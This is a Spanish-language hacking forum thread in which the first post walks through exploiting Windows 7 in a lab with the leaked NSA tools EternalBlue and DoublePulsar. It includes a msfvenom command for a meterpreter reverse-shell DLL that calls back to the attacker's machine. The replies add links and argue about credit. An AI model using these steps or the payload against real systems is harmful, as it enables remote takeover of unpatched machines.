Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: Stuxnet en Abril 23, 2017, 04:41:28 PM

Título: Hackeando como la nsa
Publicado por: Stuxnet en Abril 23, 2017, 04:41:28 PM
(http://i2.cdn.turner.com/money/dam/assets/160112181908-nsa-worlds-best-hacker-thief-780x439.jpg)

Buenas en este pequeño post, explotaremos una vulnerabilidad de Ejecución de codigo remoto en smb de windows descubierta por la nsa.
Desde hace unos días el grupo shadowbroker ha liberado nuevos exploits que afectan windows, SWIFT etc.

Las vulnerabilidades en windows son las siguientes:

(https://2.bp.blogspot.com/-QO2vBzZrsE8/WPHUSF139pI/AAAAAAAAsPA/DLWThKAsSh0BuOqY1QCL_pH9OM_RfoS_ACLcB/s1600/Shadow-Brokers-hack.png)

Requerimientos:

Kali linux - Atacante -- 192.168.1.100
Windows XP - Atacante -- 192.168.1.102
Windows 7  - Victima  -- 192.168.1.101

Fuzzbunch ha sido el nombre de este framework con los multiples exploits de windows "El mestasploit de la nsa". Programado en python 2.6  y utiliza una versión antigua de pywin32.

Montando nuestro laboratorio.

En windows XP instalamos python 2.6 https://www.python.org/download/releases/2.6/ recomiendo moficar el path con la ruta de la carpeta de python2.6, la version antigua de pywin32 https://sourceforge.net/projects/pywin32/files y ahora descargamos el leak de exploits. https://github.com/misterch0c/shadowbroker

Nos enfocamos en la carpeta windows y procederemos a modificar Fuzzbunch.xml Linea 19 y linea 24 colocaremos la ruta de la carpeta de Resources en mi caso C:\nsa\shadowbroker\windows\Resources y la de Logs en la 24 C:\nsa\shadowbroker\windows\Logs.

Ahora vamos a editar fb.py comentando las lineas 26 y 72 o si no quieren comentar unicamente creen una carpeta con el nombre listeningposts dentro de la carpeta windows.

Bien ahora desde cmd nos ubicamos en la carpeta windows y ejecutamos: python fb.py

(https://1.bp.blogspot.com/-_w9rv98rw2o/WPzx71E3bZI/AAAAAAAAAEM/9Y155OgjSjIw3ggKKn_VvqwCFdFUgcGlgCLcB/s1600/001.png)

Primero pondremos la Ip victima.
Segundo pondremos la ip atacante windows xp
Tercero pondremos no en redireccion.

(https://2.bp.blogspot.com/-zxMZ6yYZcBc/WPz5PwotXZI/AAAAAAAAAEc/rHdpIIL5xMcoNZyJvg7bc67j6IzAdkqdgCLcB/s1600/002.png)

Bien despues precionamos enter, y procedemos a crear un proyecto nuevo con el nombre de underc0de.

(https://2.bp.blogspot.com/-BbWBS2N4aBI/WPz5QOv8YxI/AAAAAAAAAEg/u4ClxO1mP8Q6OM82pUvW42wP_q06Rml2gCLcB/s1600/003.png)

Bien ahora vamos a usar el comando "use" para ver todo el arsenal de Fuzzbunch

(https://1.bp.blogspot.com/-DKpqcQdVyVs/WPz5QvZAfJI/AAAAAAAAAEk/k78xmQ2-ub8LCcoJTMCRco21EOoYGShsgCLcB/s1600/004.png)

Bien, usaremos el exploit "EternalBlue"

(https://3.bp.blogspot.com/-EYZIX99NiXU/WPz6YAZEkYI/AAAAAAAAAE4/D5GM1okM6gAXdfLd6PkrV9RNO_kBkCj0ACLcB/s1600/007.png)

Bien, ahora procedemos a dejar todo por defecto, precionando enter.

(https://1.bp.blogspot.com/-eao6vXzqHB0/WPz5ReonfxI/AAAAAAAAAEo/PxqyeWSOYao_4zO8oFcXJ3JJscwSdY_8QCLcB/s1600/005.png)

Hasta llegar a esta parte donde vamos a cambiar la opcion 0 por 1

(https://3.bp.blogspot.com/-6CIgPVUiLFM/WPz5RR_b3YI/AAAAAAAAAEs/rO8K9onuCOQPt5T_5hXoRixcVOUHWiEogCLcB/s1600/006.png)

Bien ahora seguiremos precionando enter, y si todo salio bien.

(https://1.bp.blogspot.com/-DQGgYewvVhM/WPz5R3MohsI/AAAAAAAAAEw/62rREHmCrqs8ztRleIqGjvokJQB-QCEtQCLcB/s1600/008.png)

Fuuuuuuuuuuuuck yea!!! Exploiting con exito.

Bien ahora usaremos otro genial función de Fuzzbunch DoublePulsar, para inyectar remotamente una DLL maliciosa, para eso la vamos a generar con msfvenom.

Código (text) [Seleccionar]
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp --arch x86 -f dll LHOST=192.168.1.100 LPORT=4444 > /root/nsa.dll

Nota: La dll se genero para la plataforma de windows x86

Ahora configuramos nuestro handler en metasploit.

(https://2.bp.blogspot.com/-LKPnfdhZEFA/WP0BCZV5PxI/AAAAAAAAAFI/C6inZMPgOVso2m11LqEsQZzQfzZv1qbAgCLcB/s1600/009.png)

Bien ahora copiamos nuestra dll a windows xp y ejecutamos lo siguiente

(https://2.bp.blogspot.com/-Oc22oNs8-Zo/WP0BEqwrYRI/AAAAAAAAAFU/OZsNEG3Ia9E440qFKELdphlKKwVAOIvYACLcB/s1600/010.png)

En mi caso dejare todo por defecto porque tengo la arquitectura x86
Bien ahora en este caso vamos a elejir la opcion 2 y luego nos pedira la ruta de nuestra dll.

(https://1.bp.blogspot.com/-38bidG-5ZrE/WP0BDsDZE5I/AAAAAAAAAFM/yl8_KS1taeMySb9Zph8BtFxy5TRklFU7gCLcB/s1600/011.png)

Bien ahora, como siempre todo por defecto precionando enter, y si todo salio perfectamente les saldria esto

(https://2.bp.blogspot.com/-e5Kgm6eC_e0/WP0BEU6bgfI/AAAAAAAAAFQ/AoeCs_Go980jqYHLxn6Wqdmm8eXFCpEQACLcB/s1600/012.png)

y en metasploit

(https://2.bp.blogspot.com/-PQoCZ9m77aY/WP0BE-w5PFI/AAAAAAAAAFY/bIK7FkiF4K0TgiLQKpeUE-IkjzUgLc91gCLcB/s1600/013.png)

fuck yeaaa!!! Sesion meterpreter sobre windows sin intervencion del usuario.

Recomendaciones.

Actualizar su sistema.
Título: Re:Hackeando como la nsa
Publicado por: Bael en Abril 23, 2017, 05:57:17 PM
Dejo, por un lado el enlace al paper "original" que desde que salio en muchos sitios están sacando artículos prácticos sobre el tema, pero el paper me parece el más completo la verdad. Dejo también uno de Pablo González sobre como usarlo con Metasploit. Si sale algún otro articulo practico edito y lo añado.

https://www.exploit-db.com/docs/41897.pdf (https://www.exploit-db.com/docs/41897.pdf)
http://www.elladodelmal.com/2017/04/hackear-windows-7-2008-r2-con.html (http://www.elladodelmal.com/2017/04/hackear-windows-7-2008-r2-con.html)
Título: Re:Hackeando como la nsa
Publicado por: Stuxnet en Abril 23, 2017, 08:38:47 PM
No me base en ningun sitio desde hace tiempos que hice mis pruebas, date cuenta en la generaion del payload es totalmente diferente. y si comparas la hora de la publicación es totalmente diferente pero bueno xD por esto ya no publico nada.
Título: Re:Hackeando como la nsa
Publicado por: BrowserNet en Abril 23, 2017, 11:51:35 PM
interesante articulo hermano, en unos momentos elaborare las pruebas de concepto en mi lab.
Saludos.
Título: Re:Hackeando como la nsa
Publicado por: Bael en Abril 24, 2017, 11:49:36 AM
No he dicho en ningún momento que te basaras en ese paper, lo siento si no me explique bien. He dicho que muchos sitios están sacando artículos sobre explotación de Eternalblue y Doublepulsar y que el "original" me parecía más completo. Puse original entre comillas porque he visto tanto cosas bastante interesantes, que quizá ni sabían de la existencia del de Sheila a verdaderas copias descaradas.

Título: Re:Hackeando como la nsa
Publicado por: zoro248 en Abril 24, 2017, 11:58:04 AM
Ya esta disponible el modulo en Metasploit xD, buen post


Saludos!
Título: Re:Hackeando como la nsa
Publicado por: Stuxnet en Abril 24, 2017, 04:05:52 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No he dicho en ningún momento que te basaras en ese paper, lo siento si no me explique bien. He dicho que muchos sitios están sacando artículos sobre explotación de Eternalblue y Doublepulsar y que el "original" me parecía más completo. Puse original entre comillas porque he visto tanto cosas bastante interesantes, que quizá ni sabían de la existencia del de Sheila a verdaderas copias descaradas.

Lo original es de este tipo que mis respetos https://twitter.com/hackerfantastic :3